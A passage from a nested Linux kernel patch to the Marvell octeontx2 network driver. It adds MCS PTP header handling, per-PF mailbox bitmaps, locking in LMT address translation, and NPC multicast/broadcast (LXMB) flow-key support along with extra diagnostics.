++#define MCSX_BBE_RX_SLAVE_PLFIFO_OVERFLOW_0		0xe40
++#define MCSX_BBE_TX_SLAVE_PLFIFO_OVERFLOW_0		0x12b8
+ #define MCSX_BBE_RX_SLAVE_BBE_INT ({	\
+ 	u64 offset;			\
+ 					\
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+index eb25e458266ca..dfd23580e3b8e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+@@ -11,6 +11,7 @@
+ 
+ #include "mcs.h"
+ #include "rvu.h"
++#include "mcs_reg.h"
+ #include "lmac_common.h"
+ 
+ #define M(_name, _id, _fn_name, _req_type, _rsp_type)			\
+@@ -32,6 +33,42 @@ static struct _req_type __maybe_unused					\
+ MBOX_UP_MCS_MESSAGES
+ #undef M
+ 
++void rvu_mcs_ptp_cfg(struct rvu *rvu, u8 rpm_id, u8 lmac_id, bool ena)
++{
++	struct mcs *mcs;
++	u64 cfg;
++	u8 port;
++
++	if (!rvu->mcs_blk_cnt)
++		return;
++
++	/* When ptp is enabled, RPM appends 8B header for all
++	 * RX packets. MCS PEX need to configure to skip 8B
++	 * during packet parsing.
++	 */
++
++	/* CNF10K-B */
++	if (rvu->mcs_blk_cnt > 1) {
++		mcs = mcs_get_pdata(rpm_id);
++		cfg = mcs_reg_read(mcs, MCSX_PEX_RX_SLAVE_PEX_CONFIGURATION);
++		if (ena)
++			cfg |= BIT_ULL(lmac_id);
++		else
++			cfg &= ~BIT_ULL(lmac_id);
++		mcs_reg_write(mcs, MCSX_PEX_RX_SLAVE_PEX_CONFIGURATION, cfg);
++		return;
++	}
++	/* CN10KB */
++	mcs = mcs_get_pdata(0);
++	port = (rpm_id * rvu->hw->lmac_per_cgx) + lmac_id;
++	cfg = mcs_reg_read(mcs, MCSX_PEX_RX_SLAVE_PORT_CFGX(port));
++	if (ena)
++		cfg |= BIT_ULL(0);
++	else
++		cfg &= ~BIT_ULL(0);
++	mcs_reg_write(mcs, MCSX_PEX_RX_SLAVE_PORT_CFGX(port), cfg);
++}
++
+ int rvu_mbox_handler_mcs_set_lmac_mode(struct rvu *rvu,
+ 				       struct mcs_set_lmac_mode *req,
+ 				       struct msg_rsp *rsp)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/npc.h b/drivers/net/ethernet/marvell/octeontx2/af/npc.h
+index f187293e3e084..d027c23b8ef8e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/npc.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/npc.h
+@@ -620,6 +620,7 @@ struct rvu_npc_mcam_rule {
+ 	bool vfvlan_cfg;
+ 	u16 chan;
+ 	u16 chan_mask;
++	u8 lxmb;
+ };
+ 
+ #endif /* NPC_H */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+index 3f5e09b77d4bd..873f081c030de 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+@@ -2274,7 +2274,7 @@ static inline void rvu_afvf_mbox_up_handler(struct work_struct *work)
+ }
+ 
+ static int rvu_get_mbox_regions(struct rvu *rvu, void **mbox_addr,
+-				int num, int type)
++				int num, int type, unsigned long *pf_bmap)
+ {
+ 	struct rvu_hwinfo *hw = rvu->hw;
+ 	int region;
+@@ -2286,6 +2286,9 @@ static int rvu_get_mbox_regions(struct rvu *rvu, void **mbox_addr,
+ 	 */
+ 	if (type == TYPE_AFVF) {
+ 		for (region = 0; region < num; region++) {
++			if (!test_bit(region, pf_bmap))
++				continue;
++
+ 			if (hw->cap.per_pf_mbox_regs) {
+ 				bar4 = rvu_read64(rvu, BLKADDR_RVUM,
+ 						  RVU_AF_PFX_BAR4_ADDR(0)) +
+@@ -2307,6 +2310,9 @@ static int rvu_get_mbox_regions(struct rvu *rvu, void **mbox_addr,
+ 	 * RVU_AF_PF_BAR4_ADDR register.
+ 	 */
+ 	for (region = 0; region < num; region++) {
++		if (!test_bit(region, pf_bmap))
++			continue;
++
+ 		if (hw->cap.per_pf_mbox_regs) {
+ 			bar4 = rvu_read64(rvu, BLKADDR_RVUM,
+ 					  RVU_AF_PFX_BAR4_ADDR(region));
+@@ -2335,20 +2341,41 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 	int err = -EINVAL, i, dir, dir_up;
+ 	void __iomem *reg_base;
+ 	struct rvu_work *mwork;
++	unsigned long *pf_bmap;
+ 	void **mbox_regions;
+ 	const char *name;
++	u64 cfg;
+ 
+-	mbox_regions = kcalloc(num, sizeof(void *), GFP_KERNEL);
+-	if (!mbox_regions)
++	pf_bmap = bitmap_zalloc(num, GFP_KERNEL);
++	if (!pf_bmap)
+ 		return -ENOMEM;
+ 
++	/* RVU VFs */
++	if (type == TYPE_AFVF)
++		bitmap_set(pf_bmap, 0, num);
++
++	if (type == TYPE_AFPF) {
++		/* Mark enabled PFs in bitmap */
++		for (i = 0; i < num; i++) {
++			cfg = rvu_read64(rvu, BLKADDR_RVUM, RVU_PRIV_PFX_CFG(i));
++			if (cfg & BIT_ULL(20))
++				set_bit(i, pf_bmap);
++		}
++	}
++
++	mbox_regions = kcalloc(num, sizeof(void *), GFP_KERNEL);
++	if (!mbox_regions) {
++		err = -ENOMEM;
++		goto free_bitmap;
++	}
++
+ 	switch (type) {
+ 	case TYPE_AFPF:
+ 		name = "rvu_afpf_mailbox";
+ 		dir = MBOX_DIR_AFPF;
+ 		dir_up = MBOX_DIR_AFPF_UP;
+ 		reg_base = rvu->afreg_base;
+-		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFPF);
++		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFPF, pf_bmap);
+ 		if (err)
+ 			goto free_regions;
+ 		break;
+@@ -2357,7 +2384,7 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 		dir = MBOX_DIR_PFVF;
+ 		dir_up = MBOX_DIR_PFVF_UP;
+ 		reg_base = rvu->pfreg_base;
+-		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFVF);
++		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFVF, pf_bmap);
+ 		if (err)
+ 			goto free_regions;
+ 		break;
+@@ -2388,16 +2415,19 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 	}
+ 
+ 	err = otx2_mbox_regions_init(&mw->mbox, mbox_regions, rvu->pdev,
+-				     reg_base, dir, num);
++				     reg_base, dir, num, pf_bmap);
+ 	if (err)
+ 		goto exit;
+ 
+ 	err = otx2_mbox_regions_init(&mw->mbox_up, mbox_regions, rvu->pdev,
+-				     reg_base, dir_up, num);
++				     reg_base, dir_up, num, pf_bmap);
+ 	if (err)
+ 		goto exit;
+ 
+ 	for (i = 0; i < num; i++) {
++		if (!test_bit(i, pf_bmap))
++			continue;
++
+ 		mwork = &mw->mbox_wrk[i];
+ 		mwork->rvu = rvu;
+ 		INIT_WORK(&mwork->work, mbox_handler);
+@@ -2406,8 +2436,7 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 		mwork->rvu = rvu;
+ 		INIT_WORK(&mwork->work, mbox_up_handler);
+ 	}
+-	kfree(mbox_regions);
+-	return 0;
++	goto free_regions;
+ 
+ exit:
+ 	destroy_workqueue(mw->mbox_wq);
+@@ -2416,6 +2445,8 @@ unmap_regions:
+ 		iounmap((void __iomem *)mbox_regions[num]);
+ free_regions:
+ 	kfree(mbox_regions);
++free_bitmap:
++	bitmap_free(pf_bmap);
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index b07c6f51b461b..d493b533cf76e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -851,6 +851,7 @@ int npc_install_mcam_drop_rule(struct rvu *rvu, int mcam_idx, u16 *counter_idx,
+ 			       u64 chan_val, u64 chan_mask, u64 exact_val, u64 exact_mask,
+ 			       u64 bcast_mcast_val, u64 bcast_mcast_mask);
+ void npc_mcam_rsrcs_reserve(struct rvu *rvu, int blkaddr, int entry_idx);
++bool npc_is_feature_supported(struct rvu *rvu, u64 features, u8 intf);
+ 
+ /* CPT APIs */
+ int rvu_cpt_register_interrupts(struct rvu *rvu);
+@@ -892,6 +893,7 @@ int rvu_get_hwvf(struct rvu *rvu, int pcifunc);
+ /* CN10K MCS */
+ int rvu_mcs_init(struct rvu *rvu);
+ int rvu_mcs_flr_handler(struct rvu *rvu, u16 pcifunc);
++void rvu_mcs_ptp_cfg(struct rvu *rvu, u8 rpm_id, u8 lmac_id, bool ena);
+ void rvu_mcs_exit(struct rvu *rvu);
+ 
+ #endif /* RVU_H */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+index addc69f4b65c6..9eca38547b783 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+@@ -761,6 +761,8 @@ static int rvu_cgx_ptp_rx_cfg(struct rvu *rvu, u16 pcifunc, bool enable)
+ 	/* This flag is required to clean up CGX conf if app gets killed */
+ 	pfvf->hw_rx_tstamp_en = enable;
+ 
++	/* Inform MCS about 8B RX header */
++	rvu_mcs_ptp_cfg(rvu, cgx_id, lmac_id, enable);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c
+index 7dbbc115cde42..f9faa5b23bb9d 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c
+@@ -60,13 +60,14 @@ static int rvu_get_lmtaddr(struct rvu *rvu, u16 pcifunc,
+ 			   u64 iova, u64 *lmt_addr)
+ {
+ 	u64 pa, val, pf;
+-	int err;
++	int err = 0;
+ 
+ 	if (!iova) {
+ 		dev_err(rvu->dev, "%s Requested Null address for transulation\n", __func__);
+ 		return -EINVAL;
+ 	}
+ 
++	mutex_lock(&rvu->rsrc_lock);
+ 	rvu_write64(rvu, BLKADDR_RVUM, RVU_AF_SMMU_ADDR_REQ, iova);
+ 	pf = rvu_get_pf(pcifunc) & 0x1F;
+ 	val = BIT_ULL(63) | BIT_ULL(14) | BIT_ULL(13) | pf << 8 |
+@@ -76,12 +77,13 @@ static int rvu_get_lmtaddr(struct rvu *rvu, u16 pcifunc,
+ 	err = rvu_poll_reg(rvu, BLKADDR_RVUM, RVU_AF_SMMU_ADDR_RSP_STS, BIT_ULL(0), false);
+ 	if (err) {
+ 		dev_err(rvu->dev, "%s LMTLINE iova transulation failed\n", __func__);
+-		return err;
++		goto exit;
+ 	}
+ 	val = rvu_read64(rvu, BLKADDR_RVUM, RVU_AF_SMMU_ADDR_RSP_STS);
+ 	if (val & ~0x1ULL) {
+ 		dev_err(rvu->dev, "%s LMTLINE iova transulation failed err:%llx\n", __func__, val);
+-		return -EIO;
++		err = -EIO;
++		goto exit;
+ 	}
+ 	/* PA[51:12] = RVU_AF_SMMU_TLN_FLIT0[57:18]
+ 	 * PA[11:0] = IOVA[11:0]
+@@ -89,8 +91,9 @@ static int rvu_get_lmtaddr(struct rvu *rvu, u16 pcifunc,
+ 	pa = rvu_read64(rvu, BLKADDR_RVUM, RVU_AF_SMMU_TLN_FLIT0) >> 18;
+ 	pa &= GENMASK_ULL(39, 0);
+ 	*lmt_addr = (pa << 12) | (iova  & 0xFFF);
+-
+-	return 0;
++exit:
++	mutex_unlock(&rvu->rsrc_lock);
++	return err;
+ }
+ 
+ static int rvu_update_lmtaddr(struct rvu *rvu, u16 pcifunc, u64 lmt_addr)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index abef0fd4259a3..aadc352c2ffbd 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -497,8 +497,9 @@ static int rvu_dbg_mcs_rx_secy_stats_display(struct seq_file *filp, void *unused
+ 			   stats.octet_validated_cnt);
+ 		seq_printf(filp, "secy%d: Pkts on disable port: %lld\n", secy_id,
+ 			   stats.pkt_port_disabled_cnt);
+-		seq_printf(filp, "secy%d: Octets validated: %lld\n", secy_id, stats.pkt_badtag_cnt);
+-		seq_printf(filp, "secy%d: Octets validated: %lld\n", secy_id, stats.pkt_nosa_cnt);
++		seq_printf(filp, "secy%d: Pkts with badtag: %lld\n", secy_id, stats.pkt_badtag_cnt);
++		seq_printf(filp, "secy%d: Pkts with no SA(sectag.tci.c=0): %lld\n", secy_id,
++			   stats.pkt_nosa_cnt);
+ 		seq_printf(filp, "secy%d: Pkts with nosaerror: %lld\n", secy_id,
+ 			   stats.pkt_nosaerror_cnt);
+ 		seq_printf(filp, "secy%d: Tagged ctrl pkts: %lld\n", secy_id,
+@@ -2758,6 +2759,12 @@ static void rvu_dbg_npc_mcam_show_flows(struct seq_file *s,
+ 	for_each_set_bit(bit, (unsigned long *)&rule->features, 64) {
+ 		seq_printf(s, "\t%s  ", npc_get_field_name(bit));
+ 		switch (bit) {
++		case NPC_LXMB:
++			if (rule->lxmb == 1)
++				seq_puts(s, "\tL2M nibble is set\n");
++			else
++				seq_puts(s, "\tL2B nibble is set\n");
++			break;
+ 		case NPC_DMAC:
+ 			seq_printf(s, "%pM ", rule->packet.dmac);
+ 			seq_printf(s, "mask %pM\n", rule->mask.dmac);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index 1e348fd0d930e..16cfc802e348d 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -617,6 +617,12 @@ void rvu_npc_install_ucast_entry(struct rvu *rvu, u16 pcifunc,
+ 	if (blkaddr < 0)
+ 		return;
+ 
++	/* Ucast rule should not be installed if DMAC
++	 * extraction is not supported by the profile.
++	 */
++	if (!npc_is_feature_supported(rvu, BIT_ULL(NPC_DMAC), pfvf->nix_rx_intf))
++		return;
++
+ 	index = npc_get_nixlf_mcam_index(mcam, pcifunc,
+ 					 nixlf, NIXLF_UCAST_ENTRY);
+ 
+@@ -778,6 +784,14 @@ void rvu_npc_install_bcast_match_entry(struct rvu *rvu, u16 pcifunc,
+ 	/* Get 'pcifunc' of PF device */
+ 	pcifunc = pcifunc & ~RVU_PFVF_FUNC_MASK;
+ 	pfvf = rvu_get_pfvf(rvu, pcifunc);
++
++	/* Bcast rule should not be installed if both DMAC
++	 * and LXMB extraction is not supported by the profile.
++	 */
++	if (!npc_is_feature_supported(rvu, BIT_ULL(NPC_DMAC), pfvf->nix_rx_intf) &&
++	    !npc_is_feature_supported(rvu, BIT_ULL(NPC_LXMB), pfvf->nix_rx_intf))
++		return;
++
+ 	index = npc_get_nixlf_mcam_index(mcam, pcifunc,
+ 					 nixlf, NIXLF_BCAST_ENTRY);
+ 
+@@ -848,6 +862,14 @@ void rvu_npc_install_allmulti_entry(struct rvu *rvu, u16 pcifunc, int nixlf,
+ 	vf_func = pcifunc & RVU_PFVF_FUNC_MASK;
+ 	pcifunc = pcifunc & ~RVU_PFVF_FUNC_MASK;
+ 	pfvf = rvu_get_pfvf(rvu, pcifunc);
++
++	/* Mcast rule should not be installed if both DMAC
++	 * and LXMB extraction is not supported by the profile.
++	 */
++	if (!npc_is_feature_supported(rvu, BIT_ULL(NPC_DMAC), pfvf->nix_rx_intf) &&
++	    !npc_is_feature_supported(rvu, BIT_ULL(NPC_LXMB), pfvf->nix_rx_intf))
++		return;
++
+ 	index = npc_get_nixlf_mcam_index(mcam, pcifunc,
+ 					 nixlf, NIXLF_ALLMULTI_ENTRY);
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
+index 7c4e1acd0f77b..1eb5eb29a2ba6 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
+@@ -13,11 +13,6 @@
+ #include "rvu_npc_fs.h"
+ #include "rvu_npc_hash.h"
+ 
+-#define NPC_BYTESM		GENMASK_ULL(19, 16)
+-#define NPC_HDR_OFFSET		GENMASK_ULL(15, 8)
+-#define NPC_KEY_OFFSET		GENMASK_ULL(5, 0)
+-#define NPC_LDATA_EN		BIT_ULL(7)
+-
+ static const char * const npc_flow_names[] = {
+ 	[NPC_DMAC]	= "dmac",
+ 	[NPC_SMAC]	= "smac",
+@@ -43,9 +38,23 @@ static const char * const npc_flow_names[] = {
+ 	[NPC_DPORT_UDP]	= "udp destination port",
+ 	[NPC_SPORT_SCTP] = "sctp source port",
+ 	[NPC_DPORT_SCTP] = "sctp destination port",
++	[NPC_LXMB]	= "Mcast/Bcast header ",
+ 	[NPC_UNKNOWN]	= "unknown",
+ };
+ 
++bool npc_is_feature_supported(struct rvu *rvu, u64 features, u8 intf)
++{
++	struct npc_mcam *mcam = &rvu->hw->mcam;
++	u64 mcam_features;
++	u64 unsupported;
++
++	mcam_features = is_npc_intf_tx(intf) ? mcam->tx_features : mcam->rx_features;
++	unsupported = (mcam_features ^ features) & ~mcam_features;
++
++	/* Return false if at least one of the input flows is not extracted */
++	return !unsupported;
++}
++
+ const char *npc_get_field_name(u8 hdr)
+ {
+ 	if (hdr >= ARRAY_SIZE(npc_flow_names))
+@@ -340,8 +349,10 @@ static void npc_handle_multi_layer_fields(struct rvu *rvu, int blkaddr, u8 intf)
+ 	vlan_tag2 = &key_fields[NPC_VLAN_TAG2];
+ 
+ 	/* if key profile programmed does not extract Ethertype at all */
+-	if (!etype_ether->nr_kws && !etype_tag1->nr_kws && !etype_tag2->nr_kws)
++	if (!etype_ether->nr_kws && !etype_tag1->nr_kws && !etype_tag2->nr_kws) {
++		dev_err(rvu->dev, "mkex: Ethertype is not extracted.\n");
+ 		goto vlan_tci;
++	}
+ 
+ 	/* if key profile programmed extracts Ethertype from one layer */
+ 	if (etype_ether->nr_kws && !etype_tag1->nr_kws && !etype_tag2->nr_kws)
+@@ -354,35 +365,45 @@ static void npc_handle_multi_layer_fields(struct rvu *rvu, int blkaddr, u8 intf)
+ 	/* if key profile programmed extracts Ethertype from multiple layers */
+ 	if (etype_ether->nr_kws && etype_tag1->nr_kws) {
+ 		for (i = 0; i < NPC_MAX_KWS_IN_KEY; i++) {
+-			if (etype_ether->kw_mask[i] != etype_tag1->kw_mask[i])
++			if (etype_ether->kw_mask[i] != etype_tag1->kw_mask[i]) {
++				dev_err(rvu->dev, "mkex: Etype pos is different for untagged and tagged pkts.\n");
+ 				goto vlan_tci;
++			}
+ 		}
+ 		key_fields[NPC_ETYPE] = *etype_tag1;
+ 	}
+ 	if (etype_ether->nr_kws && etype_tag2->nr_kws) {
+ 		for (i = 0; i < NPC_MAX_KWS_IN_KEY; i++) {
+-			if (etype_ether->kw_mask[i] != etype_tag2->kw_mask[i])
++			if (etype_ether->kw_mask[i] != etype_tag2->kw_mask[i]) {
++				dev_err(rvu->dev, "mkex: Etype pos is different for untagged and double tagged pkts.\n");
+ 				goto vlan_tci;
++			}
+ 		}
+ 		key_fields[NPC_ETYPE] = *etype_tag2;
+ 	}
+ 	if (etype_tag1->nr_kws && etype_tag2->nr_kws) {
+ 		for (i = 0; i < NPC_MAX_KWS_IN_KEY; i++) {
+-			if (etype_tag1->kw_mask[i] != etype_tag2->kw_mask[i])
++			if (etype_tag1->kw_mask[i] != etype_tag2->kw_mask[i]) {
++				dev_err(rvu->dev, "mkex: Etype pos is different for tagged and double tagged pkts.\n");
+ 				goto vlan_tci;
++			}
+ 		}
+ 		key_fields[NPC_ETYPE] = *etype_tag2;
+ 	}
+ 
+ 	/* check none of higher layers overwrite Ethertype */
+ 	start_lid = key_fields[NPC_ETYPE].layer_mdata.lid + 1;
+-	if (npc_check_overlap(rvu, blkaddr, NPC_ETYPE, start_lid, intf))
++	if (npc_check_overlap(rvu, blkaddr, NPC_ETYPE, start_lid, intf)) {
++		dev_err(rvu->dev, "mkex: Ethertype is overwritten by higher layers.\n");
+ 		goto vlan_tci;
++	}
+ 	*features |= BIT_ULL(NPC_ETYPE);
+ vlan_tci:
+ 	/* if key profile does not extract outer vlan tci at all */
+-	if (!vlan_tag1->nr_kws && !vlan_tag2->nr_kws)
++	if (!vlan_tag1->nr_kws && !vlan_tag2->nr_kws) {
++		dev_err(rvu->dev, "mkex: Outer vlan tci is not extracted.\n");
+ 		goto done;
++	}
+ 
+ 	/* if key profile extracts outer vlan tci from one layer */
+ 	if (vlan_tag1->nr_kws && !vlan_tag2->nr_kws)
+@@ -393,15 +414,19 @@ vlan_tci:
+ 	/* if key profile extracts outer vlan tci from multiple layers */
+ 	if (vlan_tag1->nr_kws && vlan_tag2->nr_kws) {
+ 		for (i = 0; i < NPC_MAX_KWS_IN_KEY; i++) {
+-			if (vlan_tag1->kw_mask[i] != vlan_tag2->kw_mask[i])
++			if (vlan_tag1->kw_mask[i] != vlan_tag2->kw_mask[i]) {
++				dev_err(rvu->dev, "mkex: Out vlan tci pos is different for tagged and double tagged pkts.\n");
+ 				goto done;
++			}
+ 		}
+ 		key_fields[NPC_OUTER_VID] = *vlan_tag2;
+ 	}
+ 	/* check none of higher layers overwrite outer vlan tci */
+ 	start_lid = key_fields[NPC_OUTER_VID].layer_mdata.lid + 1;
+-	if (npc_check_overlap(rvu, blkaddr, NPC_OUTER_VID, start_lid, intf))
++	if (npc_check_overlap(rvu, blkaddr, NPC_OUTER_VID, start_lid, intf)) {
++		dev_err(rvu->dev, "mkex: Outer vlan tci is overwritten by higher layers.\n");
+ 		goto done;
++	}
+ 	*features |= BIT_ULL(NPC_OUTER_VID);
+ done:
+ 	return;
+@@ -410,6 +435,7 @@ done:
+ static void npc_scan_ldata(struct rvu *rvu, int blkaddr, u8 lid,
+ 			   u8 lt, u64 cfg, u8 intf)
+ {
++	struct npc_mcam_kex_hash *mkex_hash = rvu->kpu.mkex_hash;
+ 	struct npc_mcam *mcam = &rvu->hw->mcam;
+ 	u8 hdr, key, nr_bytes, bit_offset;
+ 	u8 la_ltype, la_start;
+@@ -419,8 +445,6 @@ static void npc_scan_ldata(struct rvu *rvu, int blkaddr, u8 lid,
+ 	nr_bytes = FIELD_GET(NPC_BYTESM, cfg) + 1;
+ 	hdr = FIELD_GET(NPC_HDR_OFFSET, cfg);
+ 	key = FIELD_GET(NPC_KEY_OFFSET, cfg);
+-	start_kwi = key / 8;
+-	offset = (key * 8) % 64;
+ 
+ 	/* For Tx, Layer A has NIX_INST_HDR_S(64 bytes) preceding
+ 	 * ethernet header.
+@@ -435,13 +459,18 @@ static void npc_scan_ldata(struct rvu *rvu, int blkaddr, u8 lid,
+ 
+ #define NPC_SCAN_HDR(name, hlid, hlt, hstart, hlen)			       \
+ do {									       \
++	start_kwi = key / 8;						       \
++	offset = (key * 8) % 64;					       \
+ 	if (lid == (hlid) && lt == (hlt)) {				       \
+ 		if ((hstart) >= hdr &&					       \
+ 		    ((hstart) + (hlen)) <= (hdr + nr_bytes)) {	               \
+ 			bit_offset = (hdr + nr_bytes - (hstart) - (hlen)) * 8; \
+ 			npc_set_layer_mdata(mcam, (name), cfg, lid, lt, intf); \
++			offset += bit_offset;				       \
++			start_kwi += offset / 64;			       \
++			offset %= 64;					       \
+ 			npc_set_kw_masks(mcam, (name), (hlen) * 8,	       \
+-					 start_kwi, offset + bit_offset, intf);\
++					 start_kwi, offset, intf);	       \
+ 		}							       \
+ 	}								       \
+ } while (0)
+@@ -453,8 +482,21 @@ do {									       \
+ 	NPC_SCAN_HDR(NPC_TOS, NPC_LID_LC, NPC_LT_LC_IP, 1, 1);
+ 	NPC_SCAN_HDR(NPC_SIP_IPV4, NPC_LID_LC, NPC_LT_LC_IP, 12, 4);
+ 	NPC_SCAN_HDR(NPC_DIP_IPV4, NPC_LID_LC, NPC_LT_LC_IP, 16, 4);
+-	NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 16);
+-	NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 16);
++	if (rvu->hw->cap.npc_hash_extract) {
++		if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][0])
++			NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 4);
++		else
++			NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 16);
++
++		if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][1])
++			NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 4);
++		else
++			NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 16);
++	} else {
++		NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 16);
++		NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 16);
++	}
++
+ 	NPC_SCAN_HDR(NPC_SPORT_UDP, NPC_LID_LD, NPC_LT_LD_UDP, 0, 2);
+ 	NPC_SCAN_HDR(NPC_DPORT_UDP, NPC_LID_LD, NPC_LT_LD_UDP, 2, 2);
+ 	NPC_SCAN_HDR(NPC_SPORT_TCP, NPC_LID_LD, NPC_LT_LD_TCP, 0, 2);
+@@ -522,6 +564,10 @@ static void npc_set_features(struct rvu *rvu, int blkaddr, u8 intf)
+ 	if (npc_check_field(rvu, blkaddr, NPC_LB, intf))
+ 		*features |= BIT_ULL(NPC_VLAN_ETYPE_CTAG) |
+ 			     BIT_ULL(NPC_VLAN_ETYPE_STAG);
++
++	/* for L2M/L2B/L3M/L3B, check if the type is present in the key */
++	if (npc_check_field(rvu, blkaddr, NPC_LXMB, intf))
++		*features |= BIT_ULL(NPC_LXMB);
+ }
+ 
+ /* Scan key extraction profile and record how fields of our interest
+@@ -553,8 +599,7 @@ static int npc_scan_kex(struct rvu *rvu, int blkaddr, u8 intf)
+ 	 */
+ 	masked_cfg = cfg & NPC_EXACT_NIBBLE;
+ 	bitnr = NPC_EXACT_NIBBLE_START;
+-	for_each_set_bit_from(bitnr, (unsigned long *)&masked_cfg,
+-			      NPC_EXACT_NIBBLE_START) {
++	for_each_set_bit_from(bitnr, (unsigned long *)&masked_cfg, NPC_EXACT_NIBBLE_END + 1) {
+ 		npc_scan_exact_result(mcam, bitnr, key_nibble, intf);
+ 		key_nibble++;
+ 	}
+@@ -599,16 +644,6 @@ static int npc_scan_verify_kex(struct rvu *rvu, int blkaddr)
+ 		dev_err(rvu->dev, "Channel cannot be overwritten\n");
+ 		return -EINVAL;
+ 	}
+-	/* DMAC should be present in key for unicast filter to work */
+-	if (!npc_is_field_present(rvu, NPC_DMAC, NIX_INTF_RX)) {
+-		dev_err(rvu->dev, "DMAC not present in Key\n");
+-		return -EINVAL;
+-	}
+-	/* check that none of the fields overwrite DMAC */
+-	if (npc_check_overlap(rvu, blkaddr, NPC_DMAC, 0, NIX_INTF_RX)) {
+-		dev_err(rvu->dev, "DMAC cannot be overwritten\n");
+-		return -EINVAL;
+-	}
+ 
+ 	npc_set_features(rvu, blkaddr, NIX_INTF_TX);
+ 	npc_set_features(rvu, blkaddr, NIX_INTF_RX);
+@@ -639,9 +674,9 @@ static int npc_check_unsupported_flows(struct rvu *rvu, u64 features, u8 intf)
+ 
+ 	unsupported = (*mcam_features ^ features) & ~(*mcam_features);
+ 	if (unsupported) {
+-		dev_info(rvu->dev, "Unsupported flow(s):\n");
++		dev_warn(rvu->dev, "Unsupported flow(s):\n");
+ 		for_each_set_bit(bit, (unsigned long *)&unsupported, 64)
+-			dev_info(rvu->dev, "%s ", npc_get_field_name(bit));
++			dev_warn(rvu->dev, "%s ", npc_get_field_name(bit));
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+@@ -851,6 +886,11 @@ static void npc_update_flow(struct rvu *rvu, struct mcam_entry *entry,
+ 		npc_update_entry(rvu, NPC_LE, entry, NPC_LT_LE_ESP,
+ 				 0, ~0ULL, 0, intf);
+ 
++	if (features & BIT_ULL(NPC_LXMB)) {
++		output->lxmb = is_broadcast_ether_addr(pkt->dmac) ? 2 : 1;
++		npc_update_entry(rvu, NPC_LXMB, entry, output->lxmb, 0,
++				 output->lxmb, 0, intf);
++	}
+ #define NPC_WRITE_FLOW(field, member, val_lo, val_hi, mask_lo, mask_hi)	      \
+ do {									      \
+ 	if (features & BIT_ULL((field))) {				      \
+@@ -991,8 +1031,20 @@ static void npc_update_rx_entry(struct rvu *rvu, struct rvu_pfvf *pfvf,
+ 	action.match_id = req->match_id;
+ 	action.flow_key_alg = req->flow_key_alg;
+ 
+-	if (req->op == NIX_RX_ACTION_DEFAULT && pfvf->def_ucast_rule)
